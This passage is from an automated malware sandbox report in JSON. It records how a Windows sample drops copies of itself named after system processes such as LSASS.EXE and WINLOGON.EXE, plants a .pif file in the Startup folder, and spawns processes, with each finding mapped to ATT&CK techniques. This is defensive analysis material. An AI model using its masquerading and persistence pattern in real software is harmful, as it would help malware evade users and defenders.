"api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03eb86a@ADVAPI32.dll\"\n \"0e000f00703fb86a@ADVAPI32.dll\"\n \"0e000f00cc3fb86a@ADVAPI32.dll\"\n \"11001200b447b86a@ADVAPI32.dll\"\n \"110012004848b86a@ADVAPI32.dll\"\n \"120013008c48b86a@ADVAPI32.dll\"\n \"12001300e448b86a@ADVAPI32.dll\"\n \"14001500dc6fb86a@ADVAPI32.dll\"\n \"14001500f46fb86a@ADVAPI32.dll\"\n \"140015000c70b86a@ADVAPI32.dll\"\n \"170018002470b86a@ADVAPI32.dll\"\n \"0d000e003c70b86a@ADVAPI32.dll\"\n \"110012004c70b86a@ADVAPI32.dll\"\n \"110012006070b86a@ADVAPI32.dll\"\n \"0f001000a071b86a@ADVAPI32.dll\"\n \"14001500e071b86a@ADVAPI32.dll\"\n \"14001500f871b86a@ADVAPI32.dll\"\n \"0c000d004072b86a@ADVAPI32.dll\"\n \"0c000d005072b86a@ADVAPI32.dll\"\n \"0e000f006072b86a@ADVAPI32.dll\"\n \"0e000f007072b86a@ADVAPI32.dll\"\n \"0b000c008072b86a@ADVAPI32.dll\"\n \"18001900b874b86a@RPCRT4.dll\"\n \"13001400e474b86a@RPCRT4.dll\"\n \"14001500f874b86a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00005816)\n \"D3_08.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005972)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005972)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006136)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004272)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004132)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003836)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003096)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004308)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005816)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005972)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005972)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005972)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005972)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005972)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005972)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00006136)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00004272)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f\" has an executable section named \".text\"\n \"services.exe\" has an executable section named \".text\"\n \"D3_08.exe\" has an executable section named \".text\"\n \"shell.exe\" has an executable section named \".text\"\n \"Empty.pif\" has an executable section named \".text\"\n \"New Folder.exe\" has an executable section named \".text\"\n \"WINLOGON.EXE.bin\" has an executable section named \".text\"\n \"D3_08.EXE.67EE506D.bin\" has an executable section named \".text\"\n \"CSRSS.EXE.bin\" has an executable section named \".text\"\n \"SERVICES.EXE\" has an executable section named \".text\"\n \"D3_08.EXE.67EE4741.bin\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE5073.bin\" has an executable section named \".text\"\n \"SMSS.EXE\" has an executable section named \".text\"\n \"LSASS.EXE\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4745.bin\" has an executable section named \".text\"\n \"MrD3_08.scr\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4E36.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f\" has an writable section named \".data\"\n \"services.exe\" has an writable section named \".data\"\n \"D3_08.exe\" has an writable section named \".data\"\n \"shell.exe\" has an writable section named \".data\"\n \"Empty.pif\" has an writable section named \".data\"\n \"New Folder.exe\" has an writable section named \".data\"\n \"WINLOGON.EXE.bin\" has an writable section named \".data\"\n \"D3_08.EXE.67EE506D.bin\" has an writable section named \".data\"\n \"CSRSS.EXE.bin\" has an writable section named \".data\"\n \"SERVICES.EXE\" has an writable section named \".data\"\n \"D3_08.EXE.67EE4741.bin\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE5073.bin\" has an writable section named \".data\"\n \"SMSS.EXE\" has an writable section named \".data\"\n \"LSASS.EXE\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4745.bin\" has an writable section named \".data\"\n \"MrD3_08.scr\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4E36.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"services.exe\" - Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00005816]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00004308]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00004308]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00004308]\n Dropped file: \"lsass.exe\" - Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00005816]\n Dropped file: \"IExplorer.exe\" - Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00004308]\n Dropped file: \"winlogon.exe\" - Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00005816]\n Dropped file: \"smss.exe\" - Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00005816]\n Dropped file: \"D3_08.exe\" - Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00004308]\n Dropped file: \"csrss.exe\" - Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00005816]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00004308]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00004308]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00004308]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00004308]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00004308]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00004308]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00004308]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Windows\\D3_08.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\D3_08.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" reads file \"c:\\users\\desktop.ini\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" reads file \"c:\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" connecting to \"\\ThemeApiPort\"\n \"D3_08.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Windows\\D3_08.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Windows\\System32\\MrD3_08.scr\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\" (UID: 5816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" queries basic process information of the \"C:\\share\\D3_08\\New Folder.exe\" (UID: 5816)\n \"D3_08.exe\" queries basic process information of the \"C:\\Data HAPUBWS.exe\" (UID: 5972)\n \"D3_08.exe\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5972)\n \"IExplorer.exe\" queries basic process information of the \"C:\\share\" (UID: 6136)\n \"IExplorer.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 6136)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 4272)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\en-US\\tzres.dll.mui\" (UID: 4272)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to touch file \"C:\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe.cfg\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe.cfg\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe.Local\\\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" trying to access non-existent file \"C:\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\lsass.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" writes file \"c:\\share\\d3_08\\new folder.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" writes file \"c:\\windows\\d3_08.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" writes file \"c:\\d3_08.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" writes file \"c:\\windows\\system32\\mrd3_08.scr\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00005816]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00004308]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00004308]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00004308]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08\\New Folder.exe]- [targetUID: 00000000-00005816]\n \"CSRSS .exe\" has type \"data\"- [targetUID: N/A]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE506D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) 